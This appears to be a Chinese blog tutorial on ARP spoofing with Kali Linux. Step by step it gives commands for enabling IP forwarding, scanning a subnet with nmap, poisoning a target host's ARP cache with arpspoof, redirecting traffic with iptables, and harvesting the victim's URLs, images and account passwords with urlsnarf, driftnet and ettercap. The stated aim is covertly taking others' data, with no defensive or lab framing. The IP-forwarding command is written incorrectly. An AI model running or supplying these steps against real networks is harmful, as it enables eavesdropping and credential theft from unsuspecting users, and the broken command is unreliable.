arp欺骗可以用来获取目标的数据,解惑图片,密码等
准备工具
1.kali linux
2.nmap
3.arpspoof
4.driftnet
5.ettercap
欺骗顾明思议就是让被攻击目标毫无察觉,从而达到我们需要获取的信息
首先我们需要设置ip转发,Linux系统默认是不开启ip转发的
在终端输入echo >> 1 /proc/sys/net/ipv4/ip_forward
![](https://img.haomeiwen.com/i19489709/b2f38e7ef159a530.png)
既然要获取目标信息,那么我们自然需要知道目标主机ip
在终端输入nmap -sP <自己的网关地址/24>如下图
![](https://img.haomeiwen.com/i19489709/ce8e35637d49688b.png)
启动Arpspoof工具注入流量到默认网络
![](https://img.haomeiwen.com/i19489709/519604d9750def7a.png)
输出的信息显示了攻击者向目标主机192.168.0.6发送的数据包。其中0:c:29:b:....表示攻击者的MAC地址;ff:ff:ff....表示目标的MAC地址。当以上过程攻击成功后,目标主机192.168.0.6给网关发送数据时,都将发送到攻击者的终端上。
为了安全起见我们重定向一下防火墙规则
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
到这一步我们其实就可以诡探到目标的一些信息了,嘿嘿~~
在终端输入urlsnarf -i eth0
![](https://img.haomeiwen.com/i19489709/b758438dcff3f93d.png)
然后我们就可以使用driftnet -i eth0获取图片信息了
![](https://img.haomeiwen.com/i19489709/68d2bb1d16b3e5c3.png)
关闭掉driftnet窗口,在终端界面输入ettercap -Tq -i eth0,账号密码唾手可得
![](https://img.haomeiwen.com/i19489709/5993594ef9ea26b8.png)
![](https://img.haomeiwen.com/i19489709/1dcaf142e86afcd9.png)
网友评论